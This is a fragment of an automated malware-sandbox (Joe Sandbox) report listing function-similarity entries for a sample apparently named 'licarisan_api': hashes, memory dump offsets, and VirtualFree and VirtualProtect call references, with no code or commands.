                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: efcf237d23f1d43ed0f3677133fe890ecb8f2a9d7b7adac07fd989f1be68aaf4
                                    • Instruction ID: a50032a4c13e154a05892b193dfff34e4f983d6c7830a68b2dad251d419a7d60
                                    • Opcode Fuzzy Hash: efcf237d23f1d43ed0f3677133fe890ecb8f2a9d7b7adac07fd989f1be68aaf4
                                    • Instruction Fuzzy Hash: 5251DAB2E05314ABE7258A54DC45BFB7778FB8A310F1042FAE40D66680D67C6EC18F52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: af731f63c2b250db9cfa5d950f01727fb9f1ed3456695a4a31160b9990aec750
                                    • Instruction ID: 5ad3e7d97b6c1c440bf13dabee0e2cf5a08e4b328843a01ec4c4056bfbb69f31
                                    • Opcode Fuzzy Hash: af731f63c2b250db9cfa5d950f01727fb9f1ed3456695a4a31160b9990aec750
                                    • Instruction Fuzzy Hash: E761B3B5E04218AAEB25CF64DC447FAB774FB89311F2082EAE50DA7280D6395EC1CF51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-399585960
                                    • Opcode ID: 44ca4fb1d9d6e3f5d93bd2f02fb685e89d1f6b532f8ee7ed0f6e4791e1a517ce
                                    • Instruction ID: 96134e09aa9fe1f72136bf6f89d8e9dfdc1626ea1a7cefec0b1344864de89126
                                    • Opcode Fuzzy Hash: 44ca4fb1d9d6e3f5d93bd2f02fb685e89d1f6b532f8ee7ed0f6e4791e1a517ce
                                    • Instruction Fuzzy Hash: AB61E3B1E04328AAEB25CF54DC847FAB7B5FB89311F2082E9E50D66280D6785EC1CF51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: fef2ad6fef6e112200b01d8056e5bdb4def4a8930aef023edefc4dea60606043
                                    • Instruction ID: b7e64acfb86e13212ac15686533959ff74233feae663af9c7e71dbbf56eb4e9a
                                    • Opcode Fuzzy Hash: fef2ad6fef6e112200b01d8056e5bdb4def4a8930aef023edefc4dea60606043
                                    • Instruction Fuzzy Hash: 5361B3B5E042189AEB25CF64DC447FAB7B4FB89311F2082EAE50DA7280D6395EC1CF11
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 03eb40003d7aea7a48d3c7f105ea3e8ff05d8ea32fc4a51b69587840cfe87027
                                    • Instruction ID: b8b7e92d9b7152237af518181a550742c0f62f831b53ba9a4572bf736b3b4a4d
                                    • Opcode Fuzzy Hash: 03eb40003d7aea7a48d3c7f105ea3e8ff05d8ea32fc4a51b69587840cfe87027
                                    • Instruction Fuzzy Hash: 9C51F7B2E006149BE7208A14DC59BFBB778EBC5311F1042FAE90D66680D77D6EC58F61
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 609a1b9cb26e3aa2522e0ee4f1faa309225e629142b8d4171cf7ce40ef8fc6c0
                                    • Instruction ID: 89d93d233a294802a02b560c9e8b1c12a988538d0c1fcaee43f98b5dc6941631
                                    • Opcode Fuzzy Hash: 609a1b9cb26e3aa2522e0ee4f1faa309225e629142b8d4171cf7ce40ef8fc6c0
                                    • Instruction Fuzzy Hash: 1B41E971E04318ABEB258B65DC44BBAB774FBCA311F2042EAE54D66280D6386EC1CF51
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 9eebcd0e7b7385d5ef7c7b0f17f4bd759b2c7f81346ee6301c4d9706da20839f
                                    • Instruction ID: 3ffdc16ab6d6340c4aff0d61841bd96e4efc6cb509aad342ea65768bb1ba5a13
                                    • Opcode Fuzzy Hash: 9eebcd0e7b7385d5ef7c7b0f17f4bd759b2c7f81346ee6301c4d9706da20839f
                                    • Instruction Fuzzy Hash: 0041C671E05318ABEB258B54DC85BFAB774FB8A711F1042E9E40E67680C6786EC1CF51
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: eb6a7abb7b6730169ed53399002660d307ffb30814cfb39ce4ea58d2f8daef02
                                    • Instruction ID: 73e78a0fb78c357113fee7fb23c8f2a0d3e2943daccf5ce3d10d15171b6212a0
                                    • Opcode Fuzzy Hash: eb6a7abb7b6730169ed53399002660d307ffb30814cfb39ce4ea58d2f8daef02
                                    • Instruction Fuzzy Hash: 9431C1B2F00618ABE7748A15DC49FBAB779EBC5310F2042E9E50D66680DA7C6EC18E51
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 590f64cee7a2a9b17896224b807a19b6f7f14f63fe24103004ae685ae5e2c058
                                    • Instruction ID: cc1cb1ac1b063942eb606db63563e8c9e06bc8ad024985c45ad83a62e43b336e
                                    • Opcode Fuzzy Hash: 590f64cee7a2a9b17896224b807a19b6f7f14f63fe24103004ae685ae5e2c058
                                    • Instruction Fuzzy Hash: 1231C972E00318ABEB25CE24DC44BBAB775FBCA711F2042E9E50D66680C6386EC08F51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: a69b9c879ee4d4e61510bcbd93e62abcac418c4e3f509350cdbe28da51aa2944
                                    • Instruction ID: 1525e216f2bc8bcf1402efd099ecb8f3a00f55bd75e34b66b43ff55d90c0902e
                                    • Opcode Fuzzy Hash: a69b9c879ee4d4e61510bcbd93e62abcac418c4e3f509350cdbe28da51aa2944
                                    • Instruction Fuzzy Hash: 6231F6B2F01718ABFB358A55DC45BABB778EB85310F1042F9E50D96680D57C9EC08F51
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 0c97f7765b71ef8214ac5984f3205be60dc1759ccad33ba4416cbafa304ce69e
                                    • Instruction ID: 29141079ee3b7bd575e7e1cd5743c99c4c94e6e882dc8c19460af3c6d215210d
                                    • Opcode Fuzzy Hash: 0c97f7765b71ef8214ac5984f3205be60dc1759ccad33ba4416cbafa304ce69e
                                    • Instruction Fuzzy Hash: 9C31B0B2F00618ABEB748A15DC49FBAB779EBC5310F1042E9E50D67680DA786EC18F51
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: d853f152399a1d6ab5e6935ae24fff43d46c68606aaa3d3cfce9963f27704065
                                    • Instruction ID: 5c1bb31c19edeb2de70688b436b83d4af1949d83d99e26a9fd476d7411c3e83c
                                    • Opcode Fuzzy Hash: d853f152399a1d6ab5e6935ae24fff43d46c68606aaa3d3cfce9963f27704065
                                    • Instruction Fuzzy Hash: A431A571E00318ABEB358A54DC84BEAB774FB8A711F2042E9E54DA7280C6786EC08F51
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 475820cc6636f0ff1001a395c9c2a7c42a251b9f9c81458939018e2a97672b10
                                    • Instruction ID: 08351f75eebc97045d37530b15d25696c93444c5751458ef337618ac3b00b6d4
                                    • Opcode Fuzzy Hash: 475820cc6636f0ff1001a395c9c2a7c42a251b9f9c81458939018e2a97672b10
                                    • Instruction Fuzzy Hash: CB31B671E00318ABEB258A24DC44BEAB774FB89711F2042E9E50DA7280C6786EC18F51
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: b7889ebaad0b84ab2512a546ea8b73d52d05d9ddc356231a7c2b9b4f5c531176
                                    • Instruction ID: fd368957637398418a63bbebded74b8489599faa443560514f60ddb93cddf9d6
                                    • Opcode Fuzzy Hash: b7889ebaad0b84ab2512a546ea8b73d52d05d9ddc356231a7c2b9b4f5c531176
                                    • Instruction Fuzzy Hash: 9731E1B2F00214ABF7348A15DC48BAB7778EBC5320F1042F9F50D66680DA796EC18E51
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 398c79ac294e8a3224d671425b208c8b4c5ebefb929975ec32630353bfe39967
                                    • Instruction ID: 0b453bd5cd81547a118089a6ab5fea09c6808439c2be87a92644c10e12237b0c
                                    • Opcode Fuzzy Hash: 398c79ac294e8a3224d671425b208c8b4c5ebefb929975ec32630353bfe39967
                                    • Instruction Fuzzy Hash: 7431C5B2F00718ABFB358A55DC45BBBB778EB85320F1042E9E50DA6680D67C9EC08F51
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 9cb92442304782f198ce376fce12b9f74f1960ad33c9f37e40c51f26fbdab747
                                    • Instruction ID: 49e8c4e35e17b3fa1aecfa57351cd35bbf500a1fe81d78d967845060d2555a92
                                    • Opcode Fuzzy Hash: 9cb92442304782f198ce376fce12b9f74f1960ad33c9f37e40c51f26fbdab747
                                    • Instruction Fuzzy Hash: 15318771E00318ABEB358B64DC44BBAB774FB89711F2042E9E50DA6680C6796EC08F51
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: d6cac45f500da1d56d63cbf2d839432a4a5da025848ac7e8b1256f246f1a7191
                                    • Instruction ID: 63b1b9b06afb06cd5ee5260544c30912e92577c5e0f0febf079715e0609ed778
                                    • Opcode Fuzzy Hash: d6cac45f500da1d56d63cbf2d839432a4a5da025848ac7e8b1256f246f1a7191
                                    • Instruction Fuzzy Hash: 2C31B4B2F40718ABFB358A55DC45BBBB778EB85320F1042E9E50DA6680D67C9EC08F51
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 4d87bb2950da209f0fbedaaf8dc1c682a82597ed12581661aa93e1bf8978dd75
                                    • Instruction ID: a26ddbe78309eab30d06003ad0f8eb69989fdf6daa673dddf69ea97d50e4abfc
                                    • Opcode Fuzzy Hash: 4d87bb2950da209f0fbedaaf8dc1c682a82597ed12581661aa93e1bf8978dd75
                                    • Instruction Fuzzy Hash: 46318471F00718ABEB25CE64DC44BAAB775FB89711F2042E9E54DA7280C678AEC08F11
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: e465aa12786ff38937b8fed913bafcc6839dd581aafb3daf37a06a4d29d41662
                                    • Instruction ID: b166cb2ffe15f8ad6a937773f26d85b0c5844129973a17ad315fa631618e6d3f
                                    • Opcode Fuzzy Hash: e465aa12786ff38937b8fed913bafcc6839dd581aafb3daf37a06a4d29d41662
                                    • Instruction Fuzzy Hash: 5721EAB2F00714ABFB348A54DC45FAAB778FB85310F1042E9E50D96680DA789FC08F11
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: b0fa45d5876e463ad580025d175e10e510d257f028c0db719f2114d4873bf3dc
                                    • Instruction ID: 4ef7c829929a912d9c6e65b86d4828468d48d10e41dc8bf079e46500cb888f9f
                                    • Opcode Fuzzy Hash: b0fa45d5876e463ad580025d175e10e510d257f028c0db719f2114d4873bf3dc
                                    • Instruction Fuzzy Hash: C621D1B2F00314ABF7748A64DC49BBAB778EBC5310F1042E9F50D6A680DA795EC18F11
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: a015c9269c0f9357aab274a3c6c81782fd82b2ef031a25794c6bfa0c0237fd05
                                    • Instruction ID: 6a9473efeaa6b0cac19ea484c4a92f477a771782623b5dbc20003d226d1cd362
                                    • Opcode Fuzzy Hash: a015c9269c0f9357aab274a3c6c81782fd82b2ef031a25794c6bfa0c0237fd05
                                    • Instruction Fuzzy Hash: 2D21A675F01718ABEB35CE60DC48BB9B7B4FB8A711F1042E9E54DA6280C6789EC18F01
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 5d8526589c0a7cd1354d38865a31cbe857800af0b33557c2e661810eacc8e49e
                                    • Instruction ID: f6c825e70d39b73242e403de618c3362b61a147f951c19a4e6d44e4e80ef319f
                                    • Opcode Fuzzy Hash: 5d8526589c0a7cd1354d38865a31cbe857800af0b33557c2e661810eacc8e49e
                                    • Instruction Fuzzy Hash: ED213075F01718ABEB35CA60DC48BA9B7B5FB89711F1042D9E54DA6680CA785EC08F11
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 78f3dfdaee8065cce4dc377755ff394c4dd9ac3523d471fa5a4f735ab731ecb2
                                    • Instruction ID: bfbb113cd2422790bbffa36b93560f5b984fea63a4c09141054c300f30f68182
                                    • Opcode Fuzzy Hash: 78f3dfdaee8065cce4dc377755ff394c4dd9ac3523d471fa5a4f735ab731ecb2
                                    • Instruction Fuzzy Hash: 4C215171F01728ABEB35CA50DC44BAAB775FB89711F1042D9E54DA7280C6789EC0CF40
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 2905a1b3d16c9afd206afd1153e24ad67516d8cffc638537b4985609b6f4b83c
                                    • Instruction ID: a8af6e6bf767e241e4f40725efb20ffc2da44ad8dccb993f268b9740d76714fa
                                    • Opcode Fuzzy Hash: 2905a1b3d16c9afd206afd1153e24ad67516d8cffc638537b4985609b6f4b83c
                                    • Instruction Fuzzy Hash: E6115E76F01718ABEB75CA51DC44BAAB7B9BBC9711F1042D9E50DA6680CA789EC08F01
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 19a635d113a889bca145703eea937c5f941f0b0294e54e31b88c8b81cb096b1d
                                    • Instruction ID: 9dafd8aab2f3cd08ddf668af48ac0107ec79b53f75657b89b090be6e50d859a8
                                    • Opcode Fuzzy Hash: 19a635d113a889bca145703eea937c5f941f0b0294e54e31b88c8b81cb096b1d
                                    • Instruction Fuzzy Hash: FE115175F01718ABEB75CA51DC44BAAB779BBC9711F1042D9E50DA6680CA749EC08F01
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B28FD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0080FDEA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B28FD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B28FD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?), ref: 007BD1E3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516539906.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 007BD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd000_licarisan_api.jbxd
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?), ref: 007FA422
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B28FD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
